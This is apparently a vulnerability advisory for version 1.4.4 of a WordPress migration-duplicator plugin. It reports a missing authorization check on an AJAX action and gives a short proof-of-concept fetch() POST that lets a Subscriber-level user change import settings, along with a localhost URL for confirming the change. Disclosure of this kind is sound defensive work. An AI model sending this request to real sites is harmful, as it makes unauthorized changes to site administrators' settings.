Description The plugin does not authorize some AJAX requests, allowing users with a role as low as Subscriber to update some plugin settings.
fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “settings_data%5Bim_data_size_per_req%5D=100&settings;_data%5Bim_db_file_per_req%5D=200&action;=mgdp_plugin_save_import_settings”, “method”: “POST”, “mode”: “cors”, “credentials”: “include” }); Open http://127.0.0.1:8001/wp-admin/admin.php?page=wp-migration-duplicator#wt-mgdp-import and click on Advanced Options to see the updated settings.
CPE | Name | Operator | Version |
---|---|---|---|
eq | 1.4.4 |